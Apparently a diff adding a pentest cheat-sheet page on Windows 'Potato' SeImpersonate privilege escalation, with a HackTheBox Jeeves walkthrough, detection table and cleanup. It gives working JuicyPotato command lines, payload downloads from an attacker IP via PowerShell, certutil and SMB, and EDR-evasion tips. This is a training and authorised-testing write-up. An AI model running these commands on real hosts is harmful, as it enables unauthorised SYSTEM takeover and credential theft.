hives, flags</tspan></text></g> + <g class="felabel"><rect class="felabel__box" x="283" y="557" width="34" height="16" /><text class="felabel__text" x="300" y="568" text-anchor="middle">Yes</text></g> + <g class="felabel"><rect class="felabel__box" x="507" y="492" width="26" height="16" /><text class="felabel__text" x="520" y="503" text-anchor="middle">No</text></g> + </svg> + </div> +</figure> + +### 1 · Spot the opportunity — is your token weaponisable? `fas:Terminal` + +Two commands tell you whether a potato is even on the table: + +```batch +whoami /priv :: look for SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege +whoami /groups :: look for NT AUTHORITY\SERVICE (S-1-5-6) and the integrity level +``` + +`whoami /priv` is the direct check, but on stripped shells it's sometimes truncated or lies. `whoami /groups` is the corroborating tell: membership in **`NT AUTHORITY\SERVICE` (S-1-5-6)** means you're running as a *service*, and service accounts almost always carry `SeImpersonate`. A `High Mandatory Level` label alongside it says the process is already high-integrity — common for service RCE. That combination (`BUILTIN\Users` + `NT AUTHORITY\SERVICE` + High integrity) is the fingerprint of "web/app service account that can be potatoed," even before you confirm the privilege. + +Where you land in that context: + +- **IIS AppPool** identities (ASPX/PHP web shells on IIS). +- **MSSQL** service accounts (`xp_cmdshell`). +- **App-server RCE** — Jenkins, Tomcat, GitLab runners, ColdFusion. *On Jeeves this is an unauthenticated Jenkins script console on `:50000`, running as `JEEVES\kohsuke` — `whoami /groups` shows `NT AUTHORITY\SERVICE` and High integrity, so the privilege is there even though `whoami /priv` output was minimal.* +- Any **cracked service credential** you can `runas`/`psexec` with. + +### 2 · Fingerprint the host — the DCOM era decides your tool `fas:MagnifyingGlass` + +This is the step most write-ups skip, and it's why "just run the newest potato" fails. Get the exact build first: + +```batch +systeminfo | findstr /B /C:"OS Name" /C:"OS Version" +:: or, quicker: +ver +``` +```powershell +[environment]::OSVersion.Version # e.g. 10.0.10586.0 +``` + +Now the concept that ties the whole family together — **the DCOM hardening line of September 2018 (Windows 10 1809 / Server 2019):** + +- The **original** RottenPotato → JuicyPotato technique abuses `CoGetInstanceFromIStorage`: it kicks off a DCOM activation of a SYSTEM-owned CLSID and hands it a marshalled object that points OXID resolution at **`127.0.0.1:<your -l port>`**. `RPCSS` (SYSTEM) dutifully authenticates to that local port over NTLM; the tool catches that auth, negotiates a SYSTEM token, and impersonates it. Pick a CLSID that runs as SYSTEM and a free local port, and it fires. +- The **1809 / Server 2019 patch** changed DCOM so that OXID resolution no longer honours your custom port — it's forced back to port 135. That single change **killed the original JuicyPotato on 1809 and later.** +- **JuicyPotatoNG** (decoder_it & splinter_code) is the *re-do for the post-patch world*: it uses a different CLSID (the PrintNotify service, `{854A20FB-2D44-457D-992F-EF13785D2B51}`, on default port 10247) and a local SSPI/COM negotiation trick that survives the hardening. **PrintSpoofer** (Spooler named pipe) and **GodPotato** (in-process fake OXID resolver) are the other post-patch answers. + +So legacy and NG are built for **opposite eras**, and newer is not better: + +| Target build | First choice | Why | +|---|---|---| +| Win10 ≤ 1803 / Server 2016 / **build 10586** | **Legacy JuicyPotato** | Pre-hardening — the `-l`-port OXID redirect still works; NG/GodPotato often *don't* on these old builds | +| Win10 1809+ / Server 2019+ / Win11 | **PrintSpoofer** (Spooler up) → **GodPotato** → **JuicyPotatoNG** | Post-hardening — the original is dead; these are the workarounds | + +Check the Spooler if you're eyeing PrintSpoofer: `sc query spooler` → `RUNNING`. Per-OS CLSID tables for JuicyPotato live at [ohpe.it/juicy-potato/CLSID](http://ohpe.it/juicy-potato/CLSID/); the **BITS** CLSID `{4991d34b-80a1-4291-83b6-3328366b9097}` is a dependable SYSTEM-owning pick across many builds. + +### 3 · Land the binary when the box has no download tools `fas:RocketLaunch` + +Old and minimal Windows often has **no `curl`, no `wget`, no `certutil` you can rely on** (`curl.exe` only shipped with build 17063 in 2017 — Jeeves' 10586 has none of them). Work down this ladder: + +```powershell +# Best case — PowerShell is present +Invoke-WebRequest http://10.10.14.3/jp.exe -OutFile C:\Users\kohsuke\jp.exe +(New-Object Net.WebClient).DownloadFile('http://10.10.14.3/jp.exe','C:\Users\kohsuke\jp.exe') +``` +```batch +:: If certutil exists +certutil -urlcache -f http://10.10.14.3/jp.exe C:\Users\kohsuke\jp.exe +``` + +When none of those work, fall back to an **SMB share** — the reliable transport on stripped hosts: + +```bash +# On your box — SMBv2 + auth (modern Windows refuses guest/anonymous SMB) +impacket-smbserver SHARE /tmp/share -smb2support -user temp -password temp +``` +```batch +:: On the target — map, copy, then clean up the mapping when done +net use Z: \\10.10.14.3\SHARE /user:temp temp +copy Z:\JuicyPotato.exe . +copy Z:\nc64.exe . +... :: run your attack +net use Z: /delete +``` + +Stage into a directory your account owns and can execute from — your own profile (`C:\Users\<you>\`) or `C:\Windows\Temp`. You can also run straight off the share (`Z:\jp.exe ...`) if you'd rather not drop the file. + +### 4 · Fire it non-interactively and actually read the output `fas:Terminal` + +Legacy JuicyPotato, GodPotato, EfsPotato and RoguePotato **don't hand you a shell** — they run one command as SYSTEM and exit. So make SYSTEM write its output somewhere your low-priv user can read, then read it back: + +```batch +JuicyPotato.exe -l 53375 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Users\kohsuke\out.txt 2>&1" -t * +type C:\Users\kohsuke\out.txt +``` + +The three knobs, and the traps behind each: + +- **`-t *`** — try both `CreateProcessWithTokenW` (needs SeImpersonate) and `CreateProcessAsUser` (needs SeAssignPrimaryToken). A win prints `[+] authresult 0` and `NT AUTHORITY\SYSTEM`. +- **`-l <port>` — a free local port.** Confirm with `netstat -ano | findstr ":53375 "` (no output = free). **Trap:** a *failed* run also produces the output file — from your redirect, not from SYSTEM. Always `type` it and confirm it says `nt authority\system`; an empty file or a `whoami` usage error means the exploit didn't run, not that you're SYSTEM. +- **`-a "<args>"` must be one clean line.** **Trap seen live:** pasting a long command into a raw shell can wrap the line and split the `-a` string, so `whoami` runs with a stray argument and your output file contains `ERROR: Invalid argument/option - ''`. That's a mangled paste, not a broken exploit — retype it on one line. + +> [!warning]+ "The privileged process failed to communicate with our COM Server" is (usually) not a port problem +> `fas:TriangleExclamation` +> JuicyPotatoNG prints this same line whenever no SYSTEM authentication reaches its local COM server within its ~3-second window — and it *suggests* trying another `-l` port, which sends people down a rabbit hole. If you've already confirmed the port is free (or `-s` says the firewall is off and every port should work) and it still fails on **every** port and **every** CLSID, the port was never the issue: **the trigger is incompatible with this OS build.** NG's CLSID triggers and local TCP handling were engineered for post-1809 Windows; on a pre-hardening build like 10586 the privileged process never routes its auth back to NG's socket, so it times out with the generic error. GodPotato can fail on the same old builds too — its OXID unmarshal returns `0x80070776` (`OR_INVALID_OXID`, "the object exporter specified was not found") and it reports `Failed to impersonate security context token`. The fix is not a different port; it's the **era-correct tool** — drop to the original JuicyPotato, which uses the pre-hardening technique the box still permits. + +### 5 · Once you're SYSTEM `fas:MagnifyingGlass` + +SYSTEM opens every other profile on the box — and that's where the interesting things hide: credentials, KeePass databases, second-stage tooling, and data other users tucked into **NTFS Alternate Data Streams**, invisible to a plain `dir`. Make `dir /r` a reflex on every profile and desktop you couldn't read before. The full mechanics — reading, finding, hiding streams, and Mark-of-the-Web — plus a worked example of finding and reading a flag hidden this way, are in the [Alternate Data Streams guide](/sheets/pentest-workflow/alternate-data-streams-guide#finding-hidden-data--a-worked-example). + +> [!example]+ Case study — HTB Jeeves (build 10586): the sequence that actually worked +> `fas:Spider` +> Every "newer" potato failed here, which is the whole lesson. The console showed: +> - `PrintSpoofer64.exe` / `JuicyPotatoNG.exe` — *not staged yet* (`not recognized`), so transfer first. +> - `JuicyPotatoNG` (default PrintNotify CLSID on 10247, then ports 9999 / 53375, then BITS CLSID) — **every attempt** returned `failed to communicate with our COM Server`. Not a port problem: 10586 is pre-hardening, so NG's trigger never completes. +> - `GodPotato-NET4` — `UnmarshalObject: 0x80070776` → `Failed to impersonate security context token`. Same story: OXID unmarshal doesn't resolve on this build. +> +> The era-correct tool won on the first try: +> ```batch +> :: 1) no curl/wget/certutil — pull tools over SMB +> net use Z: \\10.10.14.197\SHARE /user:temp temp +> copy Z:\JuicyPotato.exe . +> :: 2) legacy JuicyPotato, BITS CLSID, free port → SYSTEM +> JuicyPotato.exe -l 53375 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Users\kohsuke\system-check.txt 2>&1" -t * +> type system-check.txt :: -> nt authority\system ([+] authresult 0 / CreateProcessWithTokenW OK) +> ``` +> From here, `dir /r` on `C:\Users\Administrator\Desktop` turns up a file with a named stream — walked through in the [ADS guide's worked example](/sheets/pentest-workflow/alternate-data-streams-guide#finding-hidden-data--a-worked-example), using this exact box. + +> [!success]+ The transferable checklist +> `fas:Lightbulb` +> 1. **`whoami /priv` *and* `/groups`** — `SeImpersonate`, or `NT AUTHORITY\SERVICE` + High integrity, means go. +> 2. **`systeminfo` first** — the OS build, not the calendar, picks the tool. Pre-1809 → original JuicyPotato; 1809+ → PrintSpoofer / GodPotato / NG. +> 3. **No download tools? Use an SMB share** (`impacket-smbserver -smb2support -user … -password …` ↔ `net use`), then `net use … /delete`. +> 4. **No shell? Redirect to a file you own** and `type` it back — and *read* it to confirm `nt authority\system`, since a failed run leaves a file too. +> 5. **A generic "try another port" error on every port = wrong tool for the era, not the wrong port.** +> 6. **`dir /r` every profile you couldn't read before** — flags, creds, and payloads get parked in ADS. + +--- + +## Detection, OPSEC & cleanup `fas:Shield` + +> [!danger] Authorised testing only +> `fas:TriangleExclamation` +> Potato attacks land you SYSTEM on a real host. Run these only against systems you're explicitly authorised to test. Track every binary, user, and hive dump you create, with full paths, and remove them at cleanup. + +**What the blue team sees:** + +| Signal | Where | +|---|---| +| `4672` Special privileges assigned to new logon; `4624` logon type 9 (new credentials) | Security log — the token-impersonation moment | +| `4688` process creation — a service account spawning `cmd.exe`/`nc64.exe`/unknown EXE from `C:\Windows\Temp` | Security log / Sysmon Event 1 | +| Named-pipe creation on `\pipe\spoolss` and odd DCOM/RPC activity | Sysmon Events 17/18 (pipe), 3 (network) | +| Files/EXEs written to `C:\Windows\Temp`, spooler dirs | Sysmon Event 11 | + +**OPSEC notes:** + +- Potatoes touch high-signal primitives (Spooler pipe, DCOM). On a monitored estate expect EDR to alert — don't burn a careful engagement on a noisy `net user ... /add`. Prefer a SYSTEM shell/token to standing up a new account. +- `C:\Windows\Temp` is convenient but heavily watched. Rename binaries to something dull; don't leave `GodPotato.exe` on disk. + +**Cleanup checklist:** + +```powershell +Remove-Item C:\Windows\Temp\ps.exe, C:\Windows\Temp\g.exe -Force -ErrorAction SilentlyContinue +Remove-Item C:\Windows\Temp\sam.sav, C:\Windows\Temp\sys.sav -Force -ErrorAction SilentlyContinue +net user backdoor /del 2>$null # if you created one +``` + +Staged a payload inside an ADS as part of this chain? The [Alternate Data Streams guide's cleanup section](/sheets/pentest-workflow/alternate-data-streams-guide#detection-opsec--cleanup) covers removing streams. + +--- + +## References `fas:BookOpen` + +| Tool / topic | Source | +|---|---| +| PrintSpoofer | [github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) · [itm4n write-up](https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/) | +| GodPotato | [github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) | +| JuicyPotatoNG | [github.com/antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) | +| JuicyPotato (legacy) | [github.com/ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) | +| RoguePotato | [github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) | +| EfsPotato | [github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) | +| SweetPotato | [github.com/CCob/SweetPotato](https://github.com/CCob/SweetPotato) | +| The Potato family, explained | [jlajara.gitlab.io — potatoes](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) | + +--- + +[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) · [Alternate Data Streams guide →](/sheets/pentest-workflow/alternate-data-streams-guide) diff --git a/src/content/sheets/pentest-workflow/windows-privesc-cpts.md b/src/content/sheets/pentest-workflow/windows-privesc-cpts.md @@ -178,7 +178,7 @@ JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 1 > 3. **RoguePotato** — legacy OXID resolver trick for when outbound DCOM to your listener is blocked (needs a redirector on port 135). > 4. **JuicyPotato** — legacy, dead ≥ Server 2019 / Win10 1809 (DCOM hardening); keep for 2016-and-older targets. > Catch callbacks with `nc -lnvp 8443`. -> Full walk-through — every flag for PrintSpoofer / GodPotato / JuicyPotatoNG / RoguePotato / EfsPotato / SweetPotato, delivery from MSSQL/IIS/WinRM, and hiding the kit in an ADS: [Potato Attacks & ADS guide](/sheets/pentest-workflow/potato-attacks-and-ads-guide). +> Full walk-through — every flag for PrintSpoofer / GodPotato / JuicyPotatoNG / RoguePotato / EfsPotato / SweetPotato, delivery from MSSQL/IIS/WinRM: [Potato Attacks guide](/sheets/pentest-workflow/potato-attacks-guide). For hiding the kit (or finding data someone else hid) in an Alternate Data Stream: [ADS guide](/sheets/pentest-workflow/alternate-data-streams-guide). **`SeDebugPrivilege` → dump LSASS / steal a SYSTEM token:** ```batch